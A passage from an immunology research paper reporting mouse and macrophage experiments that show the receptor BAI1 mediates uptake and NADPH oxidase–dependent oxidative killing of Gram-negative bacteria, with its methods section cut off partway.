cytoplasmic domain of BAI1 interacts directly with the engulfment and cell motility protein (ELMO) and Dock180, which together function as a bipartite guanine nucleotide exchange factor (GEF) that activates the Rho family guanosine triphosphatase (GTPase) Rac1 (18, 22). In addition to its role in phagocytosis (23, 24), Rac is also a critical part of the nicotinamide adenine dinucleotide phosphate (NADPH) oxidase complex, a key component of the antimicrobial reactive oxygen species (ROS) response (2527). Active, guanosine triphosphate (GTP)–bound Rac is required for the assembly of the cytosolic regulatory subunits with the transmembrane catalytic subunit gp91phox (2830). The activation of NADPH oxidase was characterized downstream of the opsonic phagocytic receptors Fc-γ receptor (FcγR) and complement receptor (CR), but its activation in response to nonopsonized Gram-negative bacteria is poorly understood. Here, we showed that BAI1 not only mediated the capture and internalization of several species of Gram-negative bacteria by macrophages but also enhanced oxidative killing in a Rac-dependent manner. We also showed that BAI1 mediated bacterial clearance in vivo, in a mouse model of peritoneal challenge. Together, these results suggest that BAI1 functions as a critical phagocytic PRR in the host response to Gram-negative bacteria. RESULTS BAI1 mediates binding and uptake of Gram-negative bacteria in primary macrophages We previously showed that BAI1 mediates the binding and uptake of Gram-negative bacteria in several cell culture model systems (22). Consistent with our earlier studies, we found that fibroblasts [LR73 Chinese hamster ovary (CHO) cells] expressing exogenous BAI internalized Escherichia coli strain DH5α more efficiently than did control, non–BAI1-expressing cells (Fig. 1A). To test the function of endogenous BAI1 in bacterial recognition, we compared primary bone marrow–derived macrophages (BMDMs) from wild-type C57BL/6 mice to cells derived from BAI1-deficient mice (19). For this purpose, bacteria were centrifuged onto monolayers of macrophages at 4°C for 5 min to enable binding, and then the cells were warmed to 37°C for an additional 30 min to enable internalization. We used an immunofluorescence-based assay to distinguish extracellular from intracellular bacteria by specifically labeling extracellular bacteria before cell permeabilization (Fig. 1B). In this assay, the total number of E. coli associated with BAI1-deficient BMDMs was reduced by about 30% relative to that associated with BAI1-expressing control macrophages (Fig. 1, C and D). We found that although the surface binding of E. coli DH5α was not statistically significantly different between wild-type and BAI1-deficient macrophages (Fig. 1, C and D, white arrowheads), internalization was reduced by ~50% in the absence of BAI1 (Fig. 1C, white arrows). This observation suggests that BAI1-mediated uptake contributes substantially to bacterial phagocytosis in primary macrophages. Fig. 1 BAI1 mediates the binding and uptake of Gram-negative bacteria by primary macrophages. (A) The internalization of E. coli DH5α was measured in parental LR73 CHO cells and cells stably expressing exogenous BAI1 using the gentamicin protection assay as described in Materials and Methods. Data are mean fold internalization ± SEM of 10 experiments. **P < 0.01 by Mann-Whitney test. (B) Schematic of the immunofluorescence-based internalization assay. Wild-type (WT) and BAI1 knockout (BAI1-KO) BMDMs were incubated with biotinylated E. coli DH5α expressing dsRed at a multiplicity of infection (MOI) of 10 for 30 min. Cells were washed and fixed, but not permeabilized, and extracellular bacteria were labeled with Alexa Fluor 488–conjugated streptavidin (SA; green). Nuclei were labeled with 4′,6-diamidino-2-phenylindole (DAPI) (blue). In this assay, intracellular bacteria appear red (indicated by arrows), whereas extracellular bacteria appear yellow (marked by arrowheads). (C) Representative images of WT and BAI1-KO BMDMs from the immunofluorescence-based internalization assay. Scale bars, 5 μm. (D) Quantification of total cell-associated bacteria (left), extracellular bacteria (center), and intracellular bacteria (right) per cell from the experiments shown in (C). At least 125 cells per experiment were imaged, and five experiments were performed. Plots show the numbers of bacteria per cell per frame ± SEM. ***P < 0.001, ****P < 0.0001 by Mann-Whitney test. BAI1 is recruited to sites of bacterial internalization in macrophages We next analyzed the cellular localization of BAI1 during bacterial recognition by confocal microscopy and live-cell imaging. Because of the poor quality of existing anti-BAI1 antibodies, we used BMDMs derived from transgenic mice expressing a BAI1 construct containing an N-terminal extracellular hemagglutinin (HA) tag (31). In uninfected macrophages, BAI1 was present on the plasma membrane and in the perinuclear region in a punctate distribution, consistent with previous reports (Fig. 2A) (18, 32). Macrophages incubated with the Gram-positive pathogen Staphylococcus aureus showed very little association or enrichment with BAI1, whereas incubation with E. coli for 30 min resulted in substantial clustering of BAI1 around associated bacteria (Fig. 2, B and C, white arrows). Because these sites were also labeled with the plasma membrane marker wheat germ agglutinin (WGA), we interpret these sites to be either phagocytic cups or phagosomes. Fig. 2 BAI1 is recruited to sites of bacterial engulfment. (A) Transgenic BMDMs expressing HA-BAI1 were fixed and stained with anti-HA antibody (green). The plasma membrane was labeled with WGA (blue), and cells were imaged by confocal microscopy. The representative image shows a single confocal section. Scale bars, 5 μm. (B and C) BMDMs expressing transgenic HA-BAI1 were infected for 30 min with either S. aureus (B) or E. coli (C) at an MOI of 10. The images show a single confocal section. The boxed areas of the merged images are magnified. White arrows indicate BAI1-positive bacteria. Scale bars, 5 μm; inset scale bars, 1 μm. (D) Quantification of the mean fluorescence intensity (MFI) of HA-BAI1 associated with bacteria. At least seven cells per condition per experiment were analyzed from a total of three experiments. A region of interest (ROI) was drawn around each bacterium, and the MFI was measured within the ROI (for details see Materials and Methods). Plot shows the MFI ± SEM of HA-BAI1 per ROI after subtraction of background MFI (Bkgd). ****P < 0.0001 by Mann-Whitney test. (E) Percentage of bacteria enriched for HA-BAI1. At least seven cells per condition were imaged. Plot shows the percentage of bacteria with an HA-BAI1 signal that was more than twofold greater than that of the background per cell ± SEM from three experiments. ****P < 0.0001 by Mann-Whitney test. (F) Schematic of the protocol for live-cell imaging analysis of BAI1 distribution. BMDMs expressing transgenic HA-BAI1 were incubated with fluorescently conjugated anti-HA antibody (green) to label extracellular receptors and then were incubated with noninvasive S. Typhimurium (∆invG) expressing dsRed. (G) Images from movie S1 are shown as a time lapse series. The white line indicates the cell periphery. Movies were generated for at least two cells from two separate experiments. Scale bars, 5 μm. The extent of the association of BAI1 with S. aureus or E. coli was quantified in two ways. First, we determined the MFI of BAI1 at sites of bacterial association. The MFI of BAI1 associated with E. coli was statistically significantly higher than that with S. aureus (Fig. 2D). Similarly, the percentage of bacteria enriched for BAI1 was 10-fold higher for E. coli than for S. aureus (Fig. 2E). Although the overall cellular distribution of BAI1 did not change in response to infection (fig. S1), these results indicate a preferential recruitment of BAI1 to sites of interaction with Gram-negative E. coli relative to sites of interaction with the Gram-positive S. aureus. Consistent with this observation, live-cell imaging indicated that BAI1 was concentrated at sites of bacterial attachment (Fig. 2, F and G, and movie S1) and that it remained associated with bacteria during internalization. Together, these findings suggest that BAI1 preferentially recognizes Gram-negative bacteria at the macrophage plasma membrane. BAI1 ligation stimulates cellular microbicidal activity The route of cellular entry can markedly affect microbe survival, immune responses, and antigen processing (14, 33). Indeed, several bacterial pathogens target specific receptors during infection to alter cellular responses and compartmentalization within macrophages (3437). Although somewhat controversial, a large body of evidence suggests that the specific subset of innate immune receptors, such as TLRs, engaged during recognition and uptake can affect phagosome maturation and particle fate (7, 38, 39). To determine whether the recognition and internalization of Gram-negative bacteria by BAI1 affected their survival, we examined intracellular microbicidal activity in primary macrophages and cell lines with a standard gentamicin protection assay. In this assay, cells were allowed to internalize bacteria for 30 min and then were chased for up to 7 hours in the presence of gentamicin, which kills extracellular, but not intracellular, bacteria. We found that BAI1-deficient BMDMs were attenuated in their ability to kill two different strains of E. coli (Fig. 3, A and B) and two Gram-negative bacterial pathogens, Salmonella Typhimurium and Pseudomonas aeruginosa (Fig. 3, C and D). Consistent with our earlier data (Fig. 2), loss of BAI1 did not affect bactericidal activity against S. aureus (Fig. 3E). Similar results were observed in peritoneal macrophages (PEMs) from wild-type and BAI1-deficient mice (Fig. 3, F and G) and BAI1-depleted J774 cells (a macrophage cell line) (fig. S2, A to C). Although the magnitude and kinetics of bacterial killing at earlier time points were affected by the loss of BAI1, differences at later time points were not as pronounced. This presumably reflects the activity of other bactericidal machinery, including antimicrobial peptides or nitric oxide. Together, these observations suggest that BAI1 not only mediates bacterial internalization but also selectively promotes microbicidal activity against Gram-negative bacteria in infected macrophages. Fig. 3 Intracellular killing of Gram-negative bacteria is increased by BAI1-mediated bacterial recognition. (A) WT and BAI1-KO BMDMs were incubated for 30 min with E. coli DH5α at an MOI of 25 (t = 0) and then chased in the presence of gentamicin for the indicated times to kill extracellular bacteria. Lysates were then plated to count viable intracellular bacteria. Survival is shown relative to the bacterial counts at t = 0. All graphs display relative mean ± SEM of at least three independent experiments. Data were analyzed by two-way analysis of variance (ANOVA) with Bonferroni post hoc comparisons. P values describe the source of variation in the data set (for example, cell genotype, time, or an interaction between the cell genotype and time, which can also be considered as kinetics). Statistical information in the figure shows the results from the post hoc comparison (cell, P < 0.05; time, P < 0.001; n = 3). (B to E) Intracellular bactericidal activity by BMDMs from the indicated mice against Gram-negative bacteria was measured as described in (A). These included E. coli BW25113 (time, P < 0.01; n = 4) (B), P. aeruginosa (cell, P < 0.05; time, P < 0.001; n = 3) (C), noninvasive S. Typhimurium (∆invG) (time, P < 0.001; n = 3) (D), and the Gram-positive S. aureus (time, P < 0.05; n = 4) (E). (F and G) The survival of intracellular (F) E. coli DH5α (cell, P < 0.05; time, P < 0.01; n = 3) and (G) E. coli BW25113 (time, P < 0.001; n = 4) in PEMs from the indicated mice was measured as described in (A). BAI1-mediated internalization of Gram-negative bacteria occurred rapidly after infection. Because the difference in bacterial survival between wild-type and BAI1-deficient cells was reduced at later time points, we hypothesized that BAI1-mediated bactericidal activity occurred earlier. To test this hypothesis, we examined microbicidal activity over a short time course in which bacteria were internalized for 15 min, washed, and then chased to 30 or 60 min. Viable associated bacteria were then quantified by colony-forming assays. BAI1-deficient BMDMs displayed statistically significantly attenuated bactericidal activity at both 30 and 60 min against nonpathogenic E. coli (Fig. 4A). Similarly, decreased microbicidal activity in BMDMs lacking BAI1 was also observed against the pathogens P. aeruginosa and two strains of Burkholderia cenocepacia (Fig. 4, B to D). Bactericidal activity against cell-associated S. aureus at early time points was minimal and did not differ between wild-type and BAI1-deficient cells (Fig. 4E). Fig. 4 Early microbicidal activity against Gram-negative bacteria is enhanced by BAI1 in macrophages. (A) WT and BAI1-KO BMDMs were incubated for 15 min with E. coli BW25113 at an MOI of 25. After extensive washing, cells were either lysed immediately (t = 0) or were chased in complete medium for 30 or 60 min. For each time point, lysates were plated on LB agar to enumerate viable bacteria. Survival is shown relative to total cell-associated bacteria at t = 0. All graphs display relative means ± SEM. Data were analyzed by two-way ANOVA with Bonferroni post hoc comparisons (cell, P < 0.0001; time, P < 0.0001; n = 8). (B to E) Cell-associated bactericidal activity of BMDMs from the indicated mice against P. aeruginosa PAO3 (cell, P < 0.01; time, P < 0.01; n = 5) (B), B. cenocepacia BC7 (cell, P < 0.01; n = 4) (C), B. cenocepacia K56-2 (cell, P < 0.01; n = 5) (D), and S. aureus (n = 5) (E) was measured as described in (A). (F) WT-flx and transgenic BAI1-RKR-AAA BMDMs were incubated with E. coli BW251113 at an MOI of 25. Bacterial killing was measured as described in (A) (cell, P < 0.01; n = 3). We previously showed that BAI1 mediates the internalization of Gram-negative bacteria by signaling through the ELMO-Dock complex, which leads to activation of the Rho family GTPase Rac1. Macrophages depleted of either BAI1 or ELMO1 are similarly impaired in their ability to internalize noninvasive S. Typhimurium (ΔinvG), and CHO cells expressing a BAI1 mutant, BAI1-R1489KR-AAA, which is unable to couple to the ELMO-Dock complex, show impaired internalization of bacteria relative to that by cells expressing wild-type BAI1 (18, 22). Το determine whether BAI1-mediated Rac1 activation contributed to the difference in bactericidal activity observed in wild-type macrophages compared to that in BAI1-deficient macrophages, we isolated BMDMs from knock-in mice expressing an HA-tagged form of this BAI1 mutant (HA–BAI1-R1489KR-AAA) (31). These cells exhibited attenuated microbicidal activity that was quantitatively similar to that of cells deficient in BAI1 (compare Fig. 4A to Fig. 4F). These results suggest that BAI1-dependent bactericidal activity is dependent on the ELMO-Dock–mediated activation of Rac1. BAI1-mediated Rac activation is enhanced in macrophages in response to bacterial infection We previously showed that cells overexpressing BAI1 exhibit increased Rac activity in response to the Gram-negative pathogen S. Typhimurium and that altering the ability of BAI1 to interact with the ELMO-Dock GEF complex inhibits Rac activation and phagocytosis (18, 22), as described earlier. To confirm that endogenous BAI1 was required for Rac activation in response to Gram-negative bacteria, we measured Rac activity in BMDMs with a well-characterized pull-down assay (40). Incubation of wild-type BMDMs with E. coli led to robust activation of Rac1 within 30 min (Fig. 5, A and B). In contrast, no detectable increase in Rac1 activation was observed in BMDMs lacking BAI1. Similar results were obtained with BMDMs that had been primed with interferon-γ (IFN-γ) (fig. S3, A and B). BAI1-deficient macrophages were not inherently defective in priming, because signaling in response to IFN-γ, as determined by measuring the phosphorylation of signal transducer and activator of transcription 1, was comparable between wild-type and BAI1-deficient cells (fig. S4A). These results suggest that endogenous BAI1 is required for the activation of Rac in response to Gram-negative bacteria. Fig. 5 Loss of BAI1 impairs Rac activation in response to E. coli. (A and B) Rac1 activation was measured by a standard pull-down assay. Unprimed BMDMs were incubated with E. coli BW25113 for 10 or 30 min. Cells were then lysed, and GTP-bound Rac was precipitated with glutathione S-transferase (GST)–p21-binding domain (PBD) beads as described in Materials and Methods. Precipitates were then analyzed by Western blotting to detect Rac1. Band intensities were quantified by densitometry. Aliquots of each cell lysate were analyzed by Western blotting for total Rac1 (bottom) to demonstrate equal total Rac1 protein in control and BAI1-KO lysates. (B) Quantitation of Western blotting data from six separate experiments. Data are mean fold changes in Rac1-GTP abundance ± SEM. Two-way ANOVA with Bonferroni post hoc comparison was used for analysis (cell, P < 0.05). ROS production in response to Gram-negative bacteria is regulated by BAI1 As professional phagocytes, macrophages use multiple mechanisms to kill bacteria, including the production of ROS and reactive nitrogen species (RNS) (41). Macrophages use two primary systems to generate ROS for oxidative killing: mitochondria and the phagocyte NADPH oxidase (25, 26, 4244). In the case of NADPH oxidase, upstream signaling initiates phosphorylation of the cytoplasmic regulatory subunit p47phox, which associates with two other cytosolic proteins, p67phox and p40phox (28). Assembly of this cytosolic complex on the phagosomal membrane and activation of the membrane-associated catalytic subunits gp91phox and p22phox require the activation of Rac1, Rac2, or both (30, 45). Whereas Rac2 is the predominant activating form of Rac in neutrophils (46), Rac1 is critical for ROS responses in macrophages (4749). Our observations that BAI1 is required for Rac activation in response to Gram-negative bacteria and that microbicidal activity is reduced in BAI1-deficient cells suggested that BAI1 may stimulate ROS production upon binding to Gram-negative bacteria. To test this hypothesis, we measured ROS production in IFN-γ–primed wild-type and BAI1-deficient BMDMs in a luminol-dependent chemiluminescence (LDCL) assay. We found that incubation of wild-type macrophages with E. coli induced the rapid and robust production of ROS, which was completely blocked by the pharmacological NADPH oxidase inhibitor diphenyleneiodonium (DPI) (Fig. 6, A and B). In contrast, ROS production was attenuated in cells lacking BAI1. Although the kinetics of activation were different, the ROS responses to two other Gram-negative bacterial pathogens, P. aeruginosa and B. cenocepacia, were attenuated in BAI1-deficient cells (Fig. 6, C to F). For comparison, no defect in ROS production was observed when macrophages were incubated with the Gram-positive bacterium S. aureus (Fig. 6, G and H) or with the phorbol ester phorbol myristate acetate (PMA) (Fig. 6, I and J). Furthermore, macrophages derived from gp91phox-deficient mice, which are completely defective in phagocyte NADPH oxidase activity, showed no detectable ROS generation in response to E. coli (Fig. 6, K and L). Similar results were observed in an in situ fluorescence assay with CellROX Green, a fluorescent ROS reporter (fig. S4B). ROS production in BAI1-deficient macrophages incubated with E. coli was reduced nearly to the level of that in gp91phox knockout cells (fig. S4, C and D). Whereas macrophage generation of ROS occurs within minutes of bacterial detection (50), generation of RNS requires the production of inducible nitric oxide synthase (iNOS), which occurs substantially later (5153). We found that cellular iNOS protein was similarly produced in wild-type and BAI1 knockout macrophages after 6 hours of exposure to E. coli, indicating that iNOS production did not require BAI1 (fig. S4E). Fig. 6 BAI1-deficient macrophages exhibit attenuated ROS production in response to Gram-negative bacteria. (A) LDCL assays were performed to measure ROS production by WT and BAI1-KO BMDMs after incubation with E. coli BW25113. DPI (10 μM) was added to replicate wells to inhibit NADPH oxidase activity. Graph shows a representative example of ROS activity and kinetics as mean relative light units (RLUs) ± SEM. Repeated-measures two-way ANOVA with Bonferroni post hoc comparison was used for analysis (interaction, P < 0.0001; cell, P < 0.0001; time, P < 0.0001). (B) The mean fold change in peak ROS production ± SEM of WT or BAI1-KO BMDMs treated with E. coli BW25113 from eight experiments was analyzed by Student’s t test. (C to J) BMDMs from WT or BAI1-KO mice were treated with the indicated inflammatory stimuli and analyzed as described in (A) and (B). The stimuli are listed, followed by the corresponding analysis of a representative experiment and the mean fold change in peak ROS production. (C) P. aeruginosa: interaction, P < 0.01; cell, P < 0.01; time, P < 0.0001. (D) P < 0.05; n = 5. (E) B. cenocepacia: interaction, P < 0.0001; cell, P < 0.05; time, P < 0.0001. (F) P < 0.05; n = 2. (G) S. aureus: time, P < 0.0001. (H) n = 5. (I) PMA: interaction, P < 0.0001; cell, P < 0.01; time, P < 0.0001. (J) n = 4. (K) ROS was measured in WT or gp91phox-KO BMDMs incubated with E. coli BW25113 using LDCL and analyzed as described in (A) (interaction, P < 0.0001; cell, P < 0.0001; time, P < 0.0001). (L) The mean fold change in peak ROS production ± SEM from three experiments is shown for WT and gp91phox-KO BMDMs treated with E. coli BW25113. Data were analyzed by Student’s t test. BAI1-mediated ROS responses result in the enhanced microbicidal activity of macrophages To determine the extent to which BAI1-mediated bactericidal activity depended on ROS, we treated control and BAI1-deficient macrophages with the ROS scavenger N-acetylcysteine (NAC) and measured bacterial survival. Treatment of infected wild-type macrophages with NAC increased bacterial survival to an extent observed in BAI1-deficient cells (Fig. 7A). Moreover, treatment of BAI1-deficient cells with NAC did not further improve bacterial survival, confirming that the extent of ROS-derived killing at this time point in the absence of BAI1 was negligible. Similar results were observed with gp91phox-deficient macrophages, which showed defects in early microbicidal activity, but no change in bacterial killing in the presence of NAC (Fig. 7, B and C). In contrast, treatment of cells with the mitochondrial ROS inhibitor MitoTEMPO (54) had no statistically significant effect on bactericidal activity (fig. S5), indicating that most of the early microbicidal ROS was derived from the phagosomal NADPH oxidase complex. Fig. 7 ROS-mediated microbicidal activity in BAI1-expressing macrophages. (A) BMDMs were pretreated with either vehicle or the ROS scavenger NAC before being incubated with E. coli BW25113 for the indicated times. Bacterial survival was measured as described in Fig. 3A. All graphs show mean survival ± SEM from four experiments. Data were analyzed by two-way ANOVA with Bonferroni post hoc comparisons. WT versus BAI1-KO: cell, P < 0.001; time, P < 0.001. WT versus WT-NAC: cell, P < 0.05; time, P < 0.05. (B) WT and gp91phox-KO BMDMs were infected with E. coli BW25113 for the indicated times, and the survival of the associated bacteria was measured and analyzed as described in Fig. 3A (cell, P < 0.01; time, P < 0.001; n = 6 experiments). (C) Incubation of WT cells with the ROS scavenger NAC reduces bacterial killing to the extent exhibited by gp91phox KO cells. WT and gp91phox KO BMDMs were incubated with E. coli BW25113 for 60 min in the presence or absence of NAC. Bacterial survival was measured as described in Fig. 3A. One-way ANOVA with Bonferroni post hoc comparison was used for analysis. n = 2 experiments. BAI1 promotes bacterial clearance in vivo Given the defect in bacterial phagocytosis and killing in BAI1-deficient primary cells, we hypothesized that BAI1 knockout animals would exhibit impaired bacterial clearance and increased susceptibility to bacterial challenge (53, 55). To test this possibility, we used a well-characterized model of bacterial peritonitis in which we infected wild-type, BAI1 knockout, and gp91phox knockout mice intraperitoneally with nonpathogenic E. coli and then analyzed several parameters of susceptibility (Fig. 8A). First, a disease score was determined for each animal based on macroscopic examination of their behavior, including posture, eye discharge, grooming, and movement at 4 hours after infection (fig. S6). BAI1-deficient animals exhibited enhanced disease activity compared to that of wild-type mice (Fig. 8B), which was comparable to that of mice lacking gp91phox. Second, BAI1 knockout animals succumbed to peritoneal infection more rapidly than did control wild-type mice (Fig. 8C). Measurement of colony-forming units (CFUs) revealed statistically significantly greater bacterial burden in the peritoneum, liver, and spleen at 4 hours after infection in BAI1 knockout mice compared to wild-type mice (Fig. 8, D to F). At 24 hours after infection, wild-type mice had almost completely cleared bacteria from the liver and spleen. In contrast, both the BAI1 knockout and gp91phox knockout animals showed persistent, viable CFUs in these tissues (Fig. 8, G to I). Furthermore, bacterial counts in the BAI1 knockout animals were similar to those in the gp91phox knockout animals, suggesting that defective ROS production contributes to increased susceptibility to bacterial infection. Fig. 8 BAI1 mediates bacterial clearance in vivo. (A) WT, BAI1-KO, and gp91phox-KO mice were infected intraperitoneally with E. coli BW25113 and analyzed on the basis of several parameters of susceptibility to bacterial challenge. Bacterial dose, length of infection, and type of analysis are shown in schematic form. (B) WT, BAI1-KO, and gp91phox-KO mice were infected intraperitoneally (IP) with 5 × 108 CFU E. coli, and disease severity was analyzed 4 hours later. Graph displays mean score ± SEM of three experiments. ***P < 0.001, **P < 0.01 by one-way ANOVA Kruskal-Wallis test with Dunn’s post hoc comparisons. (C) Survival was measured in WT and BAI1-KO mice after intraperitoneal infection with 1 × 108 CFU E. coli. Survival was blindly scored on the basis of the criteria in (B). Mantel-Cox log rank was used to compare survival. **P < 0.01; n = 2 experiments. (D to F) Bacterial burden 4 hours after infection: CFUs were measured in the peritoneum (D), liver (E), and spleen (F) of the indicated mice 4 hours after challenge with 5 × 108 CFU E. coli. Each data point is representative of a single animal. Data are mean CFUs per tissue ± SEM of four experiments. Analysis was performed by one-way ANOVA Kruskal-Wallis test with Dunn’s post hoc comparison. ***P < 0.001, **P < 0.01, *P < 0.05. (G to I) Bacterial burden at 24 hours after infection: CFUs were measured in the peritoneum (G), liver (H), and spleen (I) 24 hours after challenge with 5 × 105 CFU E. coli. Data are mean CFUs per tissue ± SEM of three experiments. Analysis was performed by one-way ANOVA Kruskal-Wallis test with Dunn’s post hoc comparison. ***P < 0.001, **P < 0.01, *P < 0.05. DISCUSSION Innate immune cells express an array of PRRs that function in bacterial detection and phagocytosis (2, 3, 14, 56). We previously showed that BAI1 acts as a PRR for Gram-negative bacteria and that it specifically binds to the relatively invariant core oligosaccharides of bacterial LPS (22). Furthermore, this recognition mechanism is distinct from that used by TLR4, which binds to the acyl chains of LPS (57). Binding of bacteria to BAI1 stimulates their phagocytic uptake through the direct activation of the ELMO-Dock complex, which acts as a GEF for Rac (22). Here, we extend these observations to show that BAI1-mediated Rac activation not only stimulates bacterial internalization by macrophages but also is necessary for robust activation of the phagosomal NADPH oxidase complex. In vitro, primary macrophages lacking BAI1 exhibited substantially reduced bactericidal activity because of attenuated induction of ROS in response to both nonpathogenic and pathogenic Gram-negative bacteria. The importance of the NADPH oxidase complex in the innate immune response to bacterial infection is highlighted in patients with chronic granulomatous disease (CGD), who have deficiencies in specific components of the NADPH oxidase machinery (26, 27). Consistent with the presentation of CGD in humans, mice deficient in gp91phox, the catalytic subunit of phagocyte NADPH oxidase, are highly susceptible to bacterial infections (53, 55, 58, 59). Note that patients with CGD are particularly susceptible to select bacterial pathogens, including B. cenocepacia (60, 61). Here, we showed that BAI1-deficient macrophages were similarly impaired in their ability to generate ROS in response to B. cenocepacia and several other Gram-negative pathogens, including P. aeruginosa and S. Typhimurium, which resulted in inefficient killing. Together, these data suggest that BAI1 broadly contributes to defense against Gram-negative bacteria. Although we cannot rule out other defects in the early inflammatory response to E. coli, such as defects in inflammatory signaling and cytokine production, we showed that the loss of BAI1 had an effect on susceptibility to bacterial challenge in vivo that was similar to that caused by loss of gp91phox, which suggests that BAI1-dependent ROS activity is a critical factor in early innate immunity and bacterial clearance. The cellular mechanisms that couple nonopsonic, phagocytic receptors to cellular bactericidal machinery are not well understood (29). It is well established that Rac1 and Rac2 are critical components of the NADPH oxidase machinery in macrophages and neutrophils, respectively (4749, 62). The recruitment and activation of Rac proteins occur through GEFs that catalyze the exchange of guanosine diphosphate for GTP (63). In neutrophils, the Rac-GEF P-Rex1 is implicated in the activation of Rac2 and NADPH oxidase by the bacterial formyl peptide fMetLeuPhe (64), whereas in both macrophages and neutrophils, the Vav family of Rho GEFs is linked to ROS and inflammatory cytokine responses downstream of TLRs (65) and FcγR (66). One study showed that deletion of the three Vav family proteins (Vav1, Vav2, and Vav3) attenuated macrophage ROS production in response to high concentrations of LPS and that the activation of Vav was dependent on the TLR adaptor protein myeloid differentiation primary response gene 88 (MyD88) (65). In that study, Vav family members mediated the activation of Rac2; however, Rac1 was not examined. In contrast, here, we observed almost complete abrogation of Rac1 activity in BAI1-deficient cells and a corresponding reduction in ROS production, suggesting that BAI1-mediated activation of these responses occurs independently of the Vav signaling pathway. Note that BAI1 does not appear to be required for phagocytosis or ROS production in response to Gram-positive bacteria, because no differences were observed between wild-type and BAI1-deficient macrophages infected with S. aureus. BAI1 signals through several pathways that lead to Rac1 activation. These include direct binding and activation of the bipartite ELMO-Dock Rac GEF complex in response to both apoptotic cells and Gram-negative bacteria (18, 22), as well as the recruitment and activation of the Par3-Tiam1 complex during synaptogenesis (67). Rac activation during synaptogenesis requires its interaction with the Par3-Tiam1 complex but not ELMO-Dock180 (68). Here, we showed that macrophages expressing a BAI1 mutant that cannot interact with ELMO-Dock were as attenuated in bacterial killing as were cells that lacked BAI1. Although we cannot rule out an interaction between BAI1 and Tiam1 in this context, this observation suggests that the ELMO-Dock complex is the primary mediator of Rac activation in response to Gram-negative bacteria. In addition to being linked to Rac, the cytoplasmic domain of BAI1 has also been linked to the activation of RhoA and extracellular signal–regulated kinase through the G protein Gα12/13 (68). In addition to NADPH oxidase, mitochondrial ROS has been implicated in oxidative killing in a pathway dependent on both TLR4 and MyD88 (44). Here, we found that MitoTEMPO, which selectively scavenges mitochondrial superoxide (54), had no effect on BAI1-dependent bactericidal activity, indicating that BAI1-mediated bacterial killing occurs independently of mitochondrial ROS. Moreover, in our hands, the ROS response to E. coli was completely absent in cells lacking the NADPH oxidase subunit gp91phox, which suggests that at least at the time points we examined, ROS production occurred primarily through the phagosomal NADPH oxidase. The reduced microbicidal activity of BAI1-deficient macrophages in vitro was comparable to that of gp91phox-deficient cells, and similar defects in bacterial clearance were observed in vivo in a mouse model of peritoneal infection. Together, these results suggest that BAI1 is an innate phagocytic receptor that couples bacterial detection to the induction of oxidative killing by stimulating Rac activation in phagocytes. There are many innate immune receptors that initiate ROS production, but they do so in response to distinct stimuli. The specificity of BAI1 for nonopsonized, Gram-negative bacteria represents a previously uncharacterized mechanism for the regulation of ROS production in macrophages. This study reveals a potentially broader role for BAI1 in modulating cellular immune responses, ROS production, and inflammation not only during infection by bacterial pathogens but also under homeostatic conditions through the recognition of resident microbes at mucosal sites. MATERIALS AND METHODS Ethics statement All experiments were performed in accordance with the recommendations in the Guide for the Care and Use of Laboratory Animals of the National Institutes of Health. Protocols were approved by the Institutional Animal Care and Use Committee at the University of Virginia (protocol number 3488). Mice Age- and sex-matched C57BL/6 mice between 6 and 10 weeks of age were used for the harvesting of primary macrophages and for peritoneal challenge experiments. BAI1 knockout mice have been described previously (19). Mice expressing transgenic wild-type BAI1 or BAI1-AAA coding sequences were generated by knocking the coding sequence for human BAI1 or its mutant into the nonessential Rosa26 locus of C57BL/6 embryonic stem (ES) cells, and generating mice with these targeted ES cells (31, 69). gp91phox knockout mice were a gift from B. Mehrad, University of Virginia (Charlottesville, VA). Mice were housed in pathogen-free conditions. Isolation and culture of cells Stable BAI1-depleted J774 macrophage cell lines were generated by transduction with lentiviruses encoding short hairpin RNA (shRNA) against murine BAI1 (hairpin sequence V3LHS_322807, catalog number RHS4531-NM_174991; Open Biosystems) and selection with puromycin. J774 cells were cultured in Dulbecco’s modified Eagle’s medium (4.5 g/liter glucose; Gibco) supplemented with 10% fetal bovine serum (FBS) and 1% penicillin-streptomycin (pen-strep). Knockdown was confirmed by quantitative reverse transcription polymerase chain reaction analysis. LR73 CHO cell lines have been described previously (18) and were cultured in α minimal essential medium (αMEM; Gibco) containing 10% FBS and 1% pen-strep. PEMs were isolated from mouse peritoneal lavage with sterile phosphate-buffered saline (PBS). To generate BMDMs, cells were seeded onto non–tissue culture–treated plastic plates and cultured in RPMI supplemented with 10% FBS, 10% L929 conditioned medium (as a source of colony-stimulating factor–1), and 1% pen-strep. BMDMs were cultured for 6 days ex vivo before use, and the culture medium was changed every 2 days. Macrophage differentiation was confirmed by flow cytometric analysis of the cell surface abundances of F4/80 (clone BM8; eBioscience) and CD11b (clone M1/70; eBioscience). Bacterial strains and culture All bacteria, including E. coli DH5α (18265-017; Invitrogen) or BW25113 [E. coli Genetic Stock Center Keio collection parent strain (70)], were cultured overnight in Luria-Bertani (LB) broth under aerobic conditions before use. Immunofluorescence microscopy was performed using either E.coli DH5α or noninvasive S. Typhimurium expressing dsRed (71). Δspa S. aureus Newman strain (72) was a gift from A. Criss, University of Virginia (Charlottesville, VA). P. aeruginosa PAO3 was a gift from B. Mehrad, University of Virginia (Charlottesville, VA). B. cenocepacia strains BC7 and K56-2 were gifts from C. Sifri, University of Virginia (Charlottesville, VA). Immunofluorescence-based internalization assay E. coli DH5α–dsRed were surface-labeled with EZ-Link Sulfo-NHS-LC-Biotin (1 mg/ml; Life Technologies) for 30 min at 4°C. BMDMs were plated on glass coverslips (Fisher) overnight before being infected for 30 min with biotinylated bacteria at an MOI of 25 in RPMI with 10% FBS. Cells were washed and then fixed with 4% paraformaldyhyde (PFA) without permeablization and then were blocked in PBS containing 3% bovine serum albumin (BSA). Extracellular bacteria were labeled with streptavidin–Alexa Fluor 488 conjugate (Life Technologies) for 30 min, after which cells were permeabilized with 0.1% Triton X-100 in PBS with 3% BSA. Cells were counterstained with DAPI to label nuclei. Images were acquired with a Nikon Eclipse E800 microscope equipped with a QImaging Retiga camera and Nikon NIS-Elements software. Test images determined optimal exposure gains, and this gain was subsequently used for all conditions within an experimental replicate. In this assay, intracellular bacteria appear red, whereas extracellular bacteria are double-positive for dsRed and Alexa Fluor 488 and appear yellow. At least 125 cells per replicate were imaged. Immunofluoresence microscopy Transgenic BMDMs (1 × 105) expressing HA-BAI1 were plated on fibronectin-coated coverslips (Sigma). The following day, the cells were incubated with E. coli DH5α–dsRed at an MOI of 10 for 30 min at 37°C. Cells were then fixed with 4% PFA and labeled with Alexa Fluor 647–conjugated WGA (5 μg/ml; Life Technologies) in Hanks’ balanced salt 